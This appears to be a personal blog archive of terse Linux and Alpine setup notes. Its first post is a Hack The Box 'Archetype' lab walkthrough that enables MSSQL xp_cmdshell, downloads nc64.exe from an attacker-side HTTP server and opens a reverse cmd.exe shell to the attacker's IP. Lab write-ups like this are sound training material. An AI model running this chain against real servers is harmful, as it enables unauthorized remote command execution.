Skip to main content

Posts

Showing posts from January, 2022

impacket install (for htb archetype)

sudo apt install nmap nmap -sC -sV {TARGET_IP} sudo apt install smbclient smbclient -N -L \\\\{TARGET_IP}\\ -N : No password -L : This option allows you to look at what services are available on a server smbclient -N \\\\{TARGET_IP}\\backups apt search impacket   sudo apt install impacket-scripts python3-impacket impacket-mssqlclient.py ARCHETYPE/[email protected]{TARGET_IP} -windows-auth find ip addr of vpn using ip addr SQL> EXEC xp_cmdshell 'net user'; EXEC sp_configure 'show advanced options', 1;  RECONFIGURE;  sp_configure;   EXEC sp_configure 'xp_cmdshell', 1;  RECONFIGURE; SQL> xp_cmdshell "whoami"cd Downloads sudo python3 -m http.server 80 sudo nc -lvnp 443 SQL> xp_cmdshell "powershell -c pwd" SQL>  xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe SQL> xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; .\nc64.exe -e cmd.exe 10.10.14.139 443" powersh

filter text

 less,more = page reader head = 1st 10 line read tail = last 10 line default sort :: cat /etc/passwd | sort grep  search for pattern cat /etc/passwd | grep "/bin/bash" exclude pattern with - cat /etc/passwd | grep -v "false\|nologin" cut cat /etc/passwd | grep -v "false\|nologin" | cut -d ":" -f1 -f specifies field -d delimiter (separator)   TR replace characters with others first option, we define which character we want to replace, and as a second option, we define the character we want to replace it with cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " column displays in column  form cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " | column -t awk first ($1) and last ($NF) result of the lin cat /etc/passwd | grep -v "false\|nologin" | tr ":" " " | awk '{print $1 , $NF }' sed The "s&quo

file descriptors

Data Stream for Input STDIN – 0 Data Stream for Output STDOUT – 1 Data Stream for Output that relates to an error occurring. STDERR – 2 find /etc/ -name shadow 2 > /dev/null redirect errors to null Redirect STDOUT to a File find /etc/ -name shadow 2 > /dev/null > results.txt Redirect STDOUT and STDERR to Separate Files find /etc/ -name shadow 2 > stderr.txt 1 > stdout.txt Redirect STDIN cat < stdout.txt Redirect STDOUT and Append to a File find /etc/ -name passwd >> stdout.txt 2 > /dev/null Redirect STDIN Stream to a File cat << EOF > stream.txt  End-Of-File (EOF) function of a Linux system file, which defines the input's end.  Pipes to use the STDOUT from one program to be processed by another.  find /etc/ -name *.conf 2 > /dev/null | grep systemd find /etc/ -name *.conf 2 > /dev/null | grep systemd | wc -l

search linux

find   find / -type f -name *.conf -newermt 2020-03-03 -size +25k -size -28k -exec ls -al {} \; 2>/dev/null -type f Hereby, we define the type of the searched object. In this case, ' f ' stands for ' file '. -name *.conf With ' -name ', we indicate the name of the file we are looking for. The asterisk ( * ) stands for 'all' files with the ' .conf ' extension. -user root This option filters all files whose owner is the root user. -size +20k We can then filter all the located files and specify that we only want to see the files that are larger than 20 KiB. -newermt 2020-03-03 With this option, we set the date. Only files newer than the specified date will be presented. -exec ls -al {} \; This option executes the specified command, using the curly brackets as placeholders for each result. The backslash escapes the next character from being interpreted by the shell because otherwise, the semicolon would terminate the command and not reach the redi

simple webserver

npm install http-server http-server -p 8080 python  python3 -m http.server python - m http . server 8000 php php -S localhost:8000 php -S 127.0.0.1:8080 src:: https://www.npmjs.com/package/http-server https://docs.python.org/3/library/http.server.html https://www.php.net/manual/en/features.commandline.webserver.php

control system using anaconda

conda install numpy scipy matplotlib # if not yet installed conda install - c conda - forge control slycot ----------------------------------------------------- # secord.py - demonstrate some standard MATLAB commands # RMM, 25 May 09 import os import matplotlib.pyplot as plt # MATLAB plotting functions from control.matlab import * # MATLAB-like functions # Parameters defining the system m = 250.0 # system mass k = 40.0 # spring constant b = 60.0 # damping constant # System matrices A = [[ 0 , 1 .], [-k/m, -b/m]] B = [[ 0 ], [ 1 /m]] C = [[ 1 ., 0 ]] sys = ss(A, B, C, 0 ) # Step response for the system plt.figure( 1 ) yout, T = step(sys) plt.plot(T.T, yout.T) plt.show( block = False ) # Bode plot for the system plt.figure( 2 ) mag, phase, om = bode(sys, logspace(- 2 , 2 ), plot = True ) plt.show( block = False ) # Nyquist plot for the system plt.figure( 3 ) nyquist(sys) plt.show( block = False ) # Root lcous plot for the sys

polar plot anaconda

 conda install numpy matplotlib  apt install vscodium  ----------------------------- import numpy as np import matplotlib.pyplot as plt     # setting the axes proj as polar plt.axes(projection = 'polar' )     # setting the length # and number of petals a = 1 n = 6     # creating an array # containing the radian values rads = np.arange( 0 , 2 * np.pi, 0.001 )      # plotting the rose for rad in rads:      r = a * np.cos(n * rad)      plt.polar(rad, r, 'g.' )      # display the polar plot plt.show() --------------------------------- https://www.geeksforgeeks.org/plotting-polar-curves-in-python/ https://docs.conda.io/en/latest/miniconda.html

runlevels

    boot  runlevels: 1.sysinit 2.shutdown 3.nonetwork 4.default 5.boot ------- 1.sysinit(/etc/runlevels/sysinit) ln -s /etc/init.d/udev-trigger udev-trigger ln -s /etc/init.d/dmesg dmesg ln -s  /etc/init.d/devfs devfs  ln -s  /etc/init.d/udev udev 2.shutdown(/etc/runlevels/shutdown) /etc/init.d/savecache /etc/init.d/killprocs /etc/init.d/mount-ro 3. empty   4.default   /etc/init.d/udev-postmount /etc/init.d/seatd 5.boot /etc/init.d/wpa_supplicant /etc/init.d/networking  /etc/init.d/hostname /etc/init.d/bootmisc /etc/init.d/urandom /etc/init.d/modules /etc/init.d/hwclock /etc/init.d/sysctl

net alpine

 cat /etc/network/interfaces   auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static     address 192.168.1.242     netmask 255.255.255.0     gateway 192.168.1.254     cat  /etc/wpa_supplicant/wpa_supplicant.conf network={     ssid="kwifi_ssid"     #psk="wifi_password" } echo "shortname" > /etc/hostname hostname -F /etc/hostname ::1 localhost ipv6-localhost ipv6-loopback fe00::0 ipv6-localnet ff00::0 ipv6-mcastprefix ff02::1 ipv6-allnodes ff02::2 ipv6-allrouters ff02::3 ipv6-allhosts 192.168.1.150 shortname.domain.com cat /etc/resolv.conf   nameserver 8.8.8.8 nameserver 1.1.1.1 # http://www.he.net/  nameserver 2001:470:20::2    modprobe ipv6 echo "ipv6" >> /etc/modules   --------- auto eth0 iface eth0 inet dhcp   iface eth0 inet static address 192.168.1.150/24 gateway 192.168.1.1 iface eth0 inet static address 192.168.1.151/24   wpa_supplicant -i wl

swaybar status

 status.sh DATE=$(date "+%a-%b-%d-%Y %I:%M%p") BATSTAT=$(cat /sys/class/power_supply/BAT0/status) BATPERC=$(cat /sys/class/power_supply/BAT0/capacity) VSTAT="$(amixer get Master)" VMUTE=" " echo "$VSTAT" | grep "\[off\]" >/dev/null && VMUTE="muted" VOLUME=$(echo "$VSTAT" | grep -o "\[[0-9]\+%\]" | sed "s/[^0-9]*//g;1q") WIFI="$(awk '/^\s*w/ { print "", int($3 * 100 / 70) "% " }' /proc/net/wireless)" KBLAYOUT=$(swaymsg -t get_inputs | grep -m1 'xkb_active_layout_name' |  awk -F '"' '{print $4}') BNESS="$(brightnessctl get)" MAX="$(brightnessctl max)" BLPERC="$((BNESS*100/MAX))" NIGHT= pgrep wlsunset && NIGHT= echo  $KBLAYOUT $NIGHT $BLPERC  $VMUTE $VOLUME  $WIFI   $BATPERC% $BATSTAT $DATE     bar {       position top  #swaybar_command waybar  status_command while ~/.config/swa

middle click sway

 ~/.config/sway/config input type:touchpad {     tap enabled     dwt enabled     middle_emulation enabled     natural_scroll disabled    # accel_profile "adaptive"     #pointer_accel 1      } middle click use: >select text and paste it with middle click no hassle ctrl+c/v  > open link in new tab >open dock/launchers/folder in new window   

get weather using curl

 nano getweather.sh ----------------------------------------- while [ 1 ] do     weather=$(curl -Ss 'https://wttr.in/Arjundhara?0&T&Q&format=1')     echo "$weather"     sleep 60 done ----------------------------------------------------------------------------------------------------------------------- src  https://github.com/chubin/wttr.in powershell Invoke-RestMethod https: // wttr.in   HELP curl wttr.in/:help   v2.wttr.in for data rich format  

efistub boot using efibootmgr

sudo blkid   # to get root uuid and set label and efi partition  nano efi ---------------------------------------------------------------------------------------------------- #!/bin/sh params="root=UUID= 2e5bf9f5-4dde-4c3f-aed4-50fbbf886be2   modules= sd-mod ,usb-storage,ext4 quiet loglevel=3   initrd=\initramfs-lts" efibootmgr --create --label " Alp " \   --disk /dev/nvme0n1 --part 1 \   --loader /vmlinuz-lts \   --unicode "${params}" \   --verbose -------------------------------------------------------------------------------- #for archlinux  #!/bin/sh params="root=UUID=a8023f6f-67a8-43db-a24d-d39ce5fdb45d  quiet loglevel=3   initrd=\booster-linux.img" efibootmgr --create --label "Arch" \   --disk /dev/nvme0n1 --part 1 \   --loader /vmlinuz-linux \   --unicode "${params}" \   --verbose ---------------------------------------------------------------------------------------------------------------------   sudo ./efi src:  ht

realme debloat

pm disable-user --user 0 package.name.example pm enable --user 0 package.name.example pm list packages -d pm uninstall --user 0 package.name.example cmd package install-existing package.name.example pm list packages pm list packages | sort pm list packages google dumpsys package package.name.example pm uninstall -k --user 0 package.name.example ::keeps data pm uninstall --user 0 package.name.example     ::delete data ------------------------------------------------------------------------------------------ RMX2180:/ $ pm list packages package:com.f1soft.esewa package:android.frameworkres.overlay package:com.android.fmradio package:com.mediatek.gba package:com.mediatek.ims package:com.factory.mmigroup package:com.android.cts.priv.ctsshim package:com.google.android.youtube package:com.google.android.ext.services package:com.coloros.onekeylockscreen package:com.coloros.phonenoareainquire package:com.oppo.oppopowermonitor package:com.android.providers.telephony package:com.andro

glibc alpine

  apk add gcompat doas apk add flatpak   gentoo chroot  sudo apk add xz mkdir ~/chroot cd ~/chroot tar -xvf stage3-*.tar.xz tar -xvf portage-latest.tar.xz mv portage usr sudo mount --bind /dev dev sudo mount --bind /sys sys sudo mount -t proc proc proc cp /etc/resolv.conf etc sudo chroot . /bin/bash    https://wiki.gentoo.org/wiki/Handbook:Main_Page     gentoo-chroot.sh !/bin/bash CHROOT_PATH="/home/$USER/chroot" cd $CHROOT_PATH mount | grep $CHROOT_PATH/dev || sudo mount --bind /dev dev mount | grep $CHROOT_PATH/sys || sudo mount --bind /sys sys mount | grep $CHROOT_PATH/proc || sudo mount -t proc proc proc cp /etc/resolv.conf etc sudo chroot --userspec=$USER:users . /bin/bash echo "You must manually unmount $CHROOT_PATH/dev, $CHROOT_PATH/sys, $CHROOT_PATH/proc."   chmod +x gentoo-chroot.sh Arch Linux sudo apk add arch-install-scripts mkdir ~/chroot && cd ~/chroot curl -O https://mirrors.edge.kernel.org/archlinux/iso/latest/archlinux-bootstrap-2021.04.0

change shell alpine

apk add libuser    (1/6) Installing gdbm (1.22-r0) (2/6) Installing mpdecimal (2.5.1-r1) (3/6) Installing readline (8.1.1-r0) (4/6) Installing python3 (3.9.7-r4) (5/6) Installing popt (1.18-r0) (6/6) Installing libuser (0.63-r0) Executing busybox-1.34.1-r3.trigger mkdir /etc/default   touch /etc/default/useradd  touch /etc/login.defs If you want to change the current user's shell: lchsh If you want to change a different user's shell: lchsh USERNAME   example sudo lchsh root Changing shell for kai. Password: New Shell [/bin/ash]: /bin/bash Shell changed. src: https://wiki.alpinelinux.org/wiki/Change_default_shell    

alpine android adb fix

sudo apk add usbutils eudev android-tools  lsusb Bus 001 Device 002: ID 0c45:671e Microdia Integrated_Webcam_HD Bus 002 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Bus 001 Device 009: ID 22d9:2765 OPPO Electronics Corp. Oppo N1 Bus 001 Device 003: ID 0cf3:e009 Qualcomm Atheros Communications Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub udevadm info -q path -n /dev/bus/usb/001/009 /devices/pci0000:00/0000:00:14.0/usb1/1-3     udevadm info -p  /devices/pci0000:00/0000:00:14.0/usb1/1-3  P: /devices/pci0000:00/0000:00:14.0/usb1/1-3 N: bus/usb/001/009 E: BUSNUM=001 E: DEVNAME=/dev/bus/usb/001/009 E: DEVNUM=009 E: DEVPATH=/devices/pci0000:00/0000:00:14.0/usb1/1-3 E: DEVTYPE=usb_device E: DRIVER=usb E: ID_BUS=usb E: ID_MODEL=2765 E: ID_MODEL_ENC=2765 E: ID_MODEL_FROM_DATABASE=Oppo N1 E: ID_MODEL_ID=2765 E: ID_REVISION=0223 E: ID_SERIAL=realme_2765_FYLFUC5HCUNVKRLB E: ID_SERIAL_SHORT=FYLFUC5HCUNVKRLB E: ID_USB_INTERFACES=:ffff00:ff4201: E: ID_VENDOR=realme E: ID_VE

android (lineage os android 10 ) on debian/ubuntu using lxc

Installing Waydroid is easy Dependencies: python3 lxc curl Wayland session manager !!IMPORTANT!! sudo apt install curl export DISTRO="focal" ( debian bullseye) curl https://repo.waydro.id/waydroid.gpg > /usr/share/keyrings/waydroid.gpg echo "deb [signed-by=/usr/share/keyrings/waydroid.gpg] https://repo.waydro.id/ $DISTRO main" > /etc/apt/sources.list.d/waydroid.list sudo apt update sudo apt install waydroid sudo waydroid init (download android image) sudo systemctl start waydroid-container waydroid session start waydroid show-full-ui  ----------------------------------------------------------------------------- autoinstall wget https://raw.githubusercontent.com/aditya24raj/darth_waydr/main/darth_waydr.sh -O ~ /Downloads/darth_waydr.sh && bash ~ /Downloads/darth_waydr.sh   --------------------------------------------------------------------------------- for alpine linux (working sway/kde/gnome)  https://pkgs.al

alpine linux dualboot

 https://wiki.alpinelinux.org/wiki/Setting_up_disks_manually#Manual_partitioning https://wiki.alpinelinux.org/wiki/Dualbooting   apk add e2fsprogs mkfs.ext4 /dev/sdXY  mount -t ext4 /dev/sdXY /mnt mount boot/esp partition to /boot setup alpine   say no to disk,config,and cache options setup-disk -m sys /mnt gksudo gedit /etc/grub.d/40_custom #!/bin/sh echo "Adding Alpine" >&2 cat << EOF menuentry "Alpine Linux" { set root=(hd0,3) linux /boot/vmlinuz-lts root=UUID=8de6973a-4a8c-40ed-b710-c4e2b42d6b7a modules=sd-mod,usb-storage,ext4 quiet initrd /boot/initramfs-lts } EOF   on systemd-boot usage  copy vmlinuz-lts and initramfs-lts to / of $ESP if its not mounted in setup  get UUID using sudo blkid and find alpine partiiton (careful with PARTUUID looks same) nano/vi  /boot/loader/entries/alpine.conf ------------------------------------------------------------------------------ title alpine linix linux /vmlinuz-lts initrd /initramfs-lts options root=UUID=